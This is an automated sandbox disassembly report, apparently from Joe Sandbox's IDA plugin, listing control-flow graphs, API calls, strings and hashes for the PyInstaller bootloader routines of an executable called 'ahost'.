                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                              • Instruction ID: 12aa85ab2cdde0f70342b0a0d965ed073491b76ac979dd2920709a4b0a1ace95
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12328221E0868252FB69FF25AC542B9E671AF44780FC44032DA7D432DAEF2CF555C3A2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 536 7ff7f92069d4-7ff7f9206a47 call 7ff7f9206708 539 7ff7f9206a61-7ff7f9206a6b call 7ff7f91f8590 536->539 540 7ff7f9206a49-7ff7f9206a52 call 7ff7f91f4f58 536->540 546 7ff7f9206a86-7ff7f9206aef CreateFileW 539->546 547 7ff7f9206a6d-7ff7f9206a84 call 7ff7f91f4f58 call 7ff7f91f4f78 539->547 545 7ff7f9206a55-7ff7f9206a5c call 7ff7f91f4f78 540->545 562 7ff7f9206da2-7ff7f9206dc2 545->562 548 7ff7f9206af1-7ff7f9206af7 546->548 549 7ff7f9206b6c-7ff7f9206b77 GetFileType 546->549 547->545 552 7ff7f9206b39-7ff7f9206b67 GetLastError call 7ff7f91f4eec 548->552 553 7ff7f9206af9-7ff7f9206afd 548->553 555 7ff7f9206bca-7ff7f9206bd1 549->555 556 7ff7f9206b79-7ff7f9206bb4 GetLastError call 7ff7f91f4eec CloseHandle 549->556 552->545 553->552 560 7ff7f9206aff-7ff7f9206b37 CreateFileW 553->560 558 7ff7f9206bd3-7ff7f9206bd7 555->558 559 7ff7f9206bd9-7ff7f9206bdc 555->559 556->545 571 7ff7f9206bba-7ff7f9206bc5 call 7ff7f91f4f78 556->571 566 7ff7f9206be2-7ff7f9206c37 call 7ff7f91f84a8 558->566 559->566 567 7ff7f9206bde 559->567 560->549 560->552 574 7ff7f9206c56-7ff7f9206c87 call 7ff7f9206488 566->574 575 7ff7f9206c39-7ff7f9206c45 call 7ff7f9206910 566->575 567->566 571->545 581 7ff7f9206c8d-7ff7f9206ccf 574->581 582 7ff7f9206c89-7ff7f9206c8b 574->582 575->574 583 7ff7f9206c47 575->583 585 7ff7f9206cf1-7ff7f9206cfc 581->585 586 7ff7f9206cd1-7ff7f9206cd5 581->586 584 7ff7f9206c49-7ff7f9206c51 call 7ff7f91fab30 582->584 583->584 584->562 588 7ff7f9206d02-7ff7f9206d06 585->588 589 7ff7f9206da0 585->589 586->585 587 7ff7f9206cd7-7ff7f9206cec 586->587 587->585 588->589 591 7ff7f9206d0c-7ff7f9206d51 CloseHandle CreateFileW 588->591 589->562 593 7ff7f9206d86-7ff7f9206d9b 591->593 594 7ff7f9206d53-7ff7f9206d81 GetLastError call 7ff7f91f4eec call 7ff7f91f86d0 591->594 593->589 594->593
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: ff76232cbed7a30bc7e6238ef5c919e726191a7b62a03495e9491e3e2f0634fa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CAC1AC32B28A4585FB50EF69D8902AC7771FB49B98B814335DA2E977E8DF38D051C390

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E841B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E849E
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84BD
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84CB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84DC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF7F91E8B09,00007FF7F91E3FA5), ref: 00007FF7F91E84E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction ID: fdff8ec491896a23328cbf41d2d808ff7423be29052fd79de16381446acd9fcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47412F21E0C54286EF75BF14BC446B9A3B0FB94754FC00671D56E826DCDF2CE54587A1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: 25ffcb3d7ceb1a0c63f1bc185bbc53a57f859ebb0c3f1d7374ee1fd0df8b4536
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91F04422A1974187FBA0AF60BC4976AE360AB84764F840335DA7D426D8DF3CE0598A50

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 329 7ff7f91e1950-7ff7f91e198b call 7ff7f91e45b0 332 7ff7f91e1991-7ff7f91e19d1 call 7ff7f91e7f80 329->332 333 7ff7f91e1c4e-7ff7f91e1c72 call 7ff7f91ec5c0 329->333 338 7ff7f91e1c3b-7ff7f91e1c3e call 7ff7f91f00bc 332->338 339 7ff7f91e19d7-7ff7f91e19e7 call 7ff7f91f0744 332->339 343 7ff7f91e1c43-7ff7f91e1c4b 338->343 344 7ff7f91e1a08-7ff7f91e1a24 call 7ff7f91f040c 339->344 345 7ff7f91e19e9-7ff7f91e1a03 call 7ff7f91f4f78 call 7ff7f91e2910 339->345 343->333 351 7ff7f91e1a26-7ff7f91e1a40 call 7ff7f91f4f78 call 7ff7f91e2910 344->351 352 7ff7f91e1a45-7ff7f91e1a5a call 7ff7f91f4f98 344->352 345->338 351->338 358 7ff7f91e1a5c-7ff7f91e1a76 call 7ff7f91f4f78 call 7ff7f91e2910 352->358 359 7ff7f91e1a7b-7ff7f91e1afc call 7ff7f91e1c80 * 2 call 7ff7f91f0744 352->359 358->338 371 7ff7f91e1b01-7ff7f91e1b14 call 7ff7f91f4fb4 359->371 374 7ff7f91e1b16-7ff7f91e1b30 call 7ff7f91f4f78 call 7ff7f91e2910 371->374 375 7ff7f91e1b35-7ff7f91e1b4e call 7ff7f91f040c 371->375 374->338 381 7ff7f91e1b50-7ff7f91e1b6a call 7ff7f91f4f78 call 7ff7f91e2910 375->381 382 7ff7f91e1b6f-7ff7f91e1b8b call 7ff7f91f0180 375->382 381->338 389 7ff7f91e1b9e-7ff7f91e1bac 382->389 390 7ff7f91e1b8d-7ff7f91e1b99 call 7ff7f91e2710 382->390 389->338 392 7ff7f91e1bb2-7ff7f91e1bb9 389->392 390->338 395 7ff7f91e1bc1-7ff7f91e1bc7 392->395 396 7ff7f91e1be0-7ff7f91e1bef 395->396 397 7ff7f91e1bc9-7ff7f91e1bd6 395->397 396->396 398 7ff7f91e1bf1-7ff7f91e1bfa 396->398 397->398 399 7ff7f91e1c0f 398->399 400 7ff7f91e1bfc-7ff7f91e1bff 398->400 402 7ff7f91e1c11-7ff7f91e1c24 399->402 400->399 401 7ff7f91e1c01-7ff7f91e1c04 400->401 401->399 403 7ff7f91e1c06-7ff7f91e1c09 401->403 404 7ff7f91e1c26 402->404 405 7ff7f91e1c2d-7ff7f91e1c39 402->405 403->399 406 7ff7f91e1c0b-7ff7f91e1c0d 403->406 404->405 405->338 405->395 406->402
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E7F80: _fread_nolock.LIBCMT ref: 00007FF7F91E802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF7F91E1A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7F91E1B6A), ref: 00007FF7F91E295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                              • Instruction ID: 595fa4c15704cc15ec1892222d3e6403c823762d84e9e687e1e3167b456afd6c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d43d2f5094c02a69a50d2278f5fdcc42b4033f4591644595bdd37c4696fd258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D816071E0868686FB60FF14E8502B9A3B0AF48744F844435DAAE877DDDE3CF54587A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 407 7ff7f91e1600-7ff7f91e1611 408 7ff7f91e1613-7ff7f91e161c call 7ff7f91e1050 407->408 409 7ff7f91e1637-7ff7f91e1651 call 7ff7f91e45b0 407->409 416 7ff7f91e162e-7ff7f91e1636 408->416 417 7ff7f91e161e-7ff7f91e1629 call 7ff7f91e2710 408->417 414 7ff7f91e1653-7ff7f91e1681 call 7ff7f91f4f78 call 7ff7f91e2910 409->414 415 7ff7f91e1682-7ff7f91e169c call 7ff7f91e45b0 409->415 424 7ff7f91e169e-7ff7f91e16b3 call 7ff7f91e2710 415->424 425 7ff7f91e16b8-7ff7f91e16cf call 7ff7f91f0744 415->425 417->416 431 7ff7f91e1821-7ff7f91e1824 call 7ff7f91f00bc 424->431 432 7ff7f91e16d1-7ff7f91e16f4 call 7ff7f91f4f78 call 7ff7f91e2910 425->432 433 7ff7f91e16f9-7ff7f91e16fd 425->433 438 7ff7f91e1829-7ff7f91e183b 431->438 446 7ff7f91e1819-7ff7f91e181c call 7ff7f91f00bc 432->446 435 7ff7f91e16ff-7ff7f91e170b call 7ff7f91e1210 433->435 436 7ff7f91e1717-7ff7f91e1737 call 7ff7f91f4fb4 433->436 443 7ff7f91e1710-7ff7f91e1712 435->443 447 7ff7f91e1761-7ff7f91e176c 436->447 448 7ff7f91e1739-7ff7f91e175c call 7ff7f91f4f78 call 7ff7f91e2910 436->448 443->446 446->431 450 7ff7f91e1802-7ff7f91e180a call 7ff7f91f4fa0 447->450 451 7ff7f91e1772-7ff7f91e1777 447->451 461 7ff7f91e180f-7ff7f91e1814 448->461 450->461 454 7ff7f91e1780-7ff7f91e17a2 call 7ff7f91f040c 451->454 462 7ff7f91e17a4-7ff7f91e17bc call 7ff7f91f0b4c 454->462 463 7ff7f91e17da-7ff7f91e17e6 call 7ff7f91f4f78 454->463 461->446 469 7ff7f91e17c5-7ff7f91e17d8 call 7ff7f91f4f78 462->469 470 7ff7f91e17be-7ff7f91e17c1 462->470 468 7ff7f91e17ed-7ff7f91e17f8 call 7ff7f91e2910 463->468 476 7ff7f91e17fd 468->476 469->468 470->454 472 7ff7f91e17c3 470->472 472->476 476->450
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
                                                                                                                                                                                                                              • Instruction ID: 7dfd2bb52a813cd2fa88728084e818a4f36b1660c0b5f18bdf84a4a0273ce494
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdb202e1f9bc7177cec46868f1cc56065c6c33e9ec8a8b0f81691881613973e0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48516B61E0864692FB20BF11AC105A9A3B0AF84B94FC44531EE2D477EAEE3CF55587A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E88F4
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E88FA
                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF7F91E3CBB), ref: 00007FF7F91E893C
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8A20: GetEnvironmentVariableW.KERNEL32(00007FF7F91E388E), ref: 00007FF7F91E8A57
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E8A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7F91E8A79
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91F82A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F82C1
                                                                                                                                                                                                                                • Part of subcall function 00007FF7F91E2810: MessageBoxW.USER32 ref: 00007FF7F91E28EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction ID: 425e2add9f0efa98f02918cfb6cdd6fa3ee344ec3189ef40375b0e480b23fa60
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B419F11E0964642FB68BF25BD552B992B1AF84784FC00131EE2D477EEEE3CE50583E2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 599 7ff7f91e1210-7ff7f91e126d call 7ff7f91ebdf0 602 7ff7f91e126f-7ff7f91e1296 call 7ff7f91e2710 599->602 603 7ff7f91e1297-7ff7f91e12af call 7ff7f91f4fb4 599->603 608 7ff7f91e12d4-7ff7f91e12e4 call 7ff7f91f4fb4 603->608 609 7ff7f91e12b1-7ff7f91e12cf call 7ff7f91f4f78 call 7ff7f91e2910 603->609 614 7ff7f91e12e6-7ff7f91e1304 call 7ff7f91f4f78 call 7ff7f91e2910 608->614 615 7ff7f91e1309-7ff7f91e131b 608->615 620 7ff7f91e1439-7ff7f91e144e call 7ff7f91ebad0 call 7ff7f91f4fa0 * 2 609->620 614->620 618 7ff7f91e1320-7ff7f91e1345 call 7ff7f91f040c 615->618 628 7ff7f91e1431 618->628 629 7ff7f91e134b-7ff7f91e1355 call 7ff7f91f0180 618->629 637 7ff7f91e1453-7ff7f91e146d 620->637 628->620 629->628 635 7ff7f91e135b-7ff7f91e1367 629->635 636 7ff7f91e1370-7ff7f91e1398 call 7ff7f91ea230 635->636 640 7ff7f91e1416-7ff7f91e142c call 7ff7f91e2710 636->640 641 7ff7f91e139a-7ff7f91e139d 636->641 640->628 642 7ff7f91e139f-7ff7f91e13a9 641->642 643 7ff7f91e1411 641->643 645 7ff7f91e13d4-7ff7f91e13d7 642->645 646 7ff7f91e13ab-7ff7f91e13b9 call 7ff7f91f0b4c 642->646 643->640 648 7ff7f91e13ea-7ff7f91e13ef 645->648 649 7ff7f91e13d9-7ff7f91e13e7 call 7ff7f9209ea0 645->649 651 7ff7f91e13be-7ff7f91e13c1 646->651 648->636 650 7ff7f91e13f5-7ff7f91e13f8 648->650 649->648 653 7ff7f91e140c-7ff7f91e140f 650->653 654 7ff7f91e13fa-7ff7f91e13fd 650->654 655 7ff7f91e13c3-7ff7f91e13cd call 7ff7f91f0180 651->655 656 7ff7f91e13cf-7ff7f91e13d2 651->656 653->628 654->640 658 7ff7f91e13ff-7ff7f91e1407 654->658 655->648 655->656 656->640 658->618
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                              • Instruction ID: 8eb643ec19bcdea21e095f0314af4773546b0d5ad10ebdf1178a366905125921
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4135646233a09d1bafe58e36eb504b74d27aad0b28d423605d6bf35aaf273347
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE519122E0864282FB61BF15B8103BAA2A1AB85794FC44135EE6E477D9EF3CE5418791

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF7F91FF11A,?,?,-00000018,00007FF7F91FADC3,?,?,?,00007FF7F91FACBA,?,?,?,00007FF7F91F5FAE), ref: 00007FF7F91FEEFC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF7F91FF11A,?,?,-00000018,00007FF7F91FADC3,?,?,?,00007FF7F91FACBA,?,?,?,00007FF7F91F5FAE), ref: 00007FF7F91FEF08
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
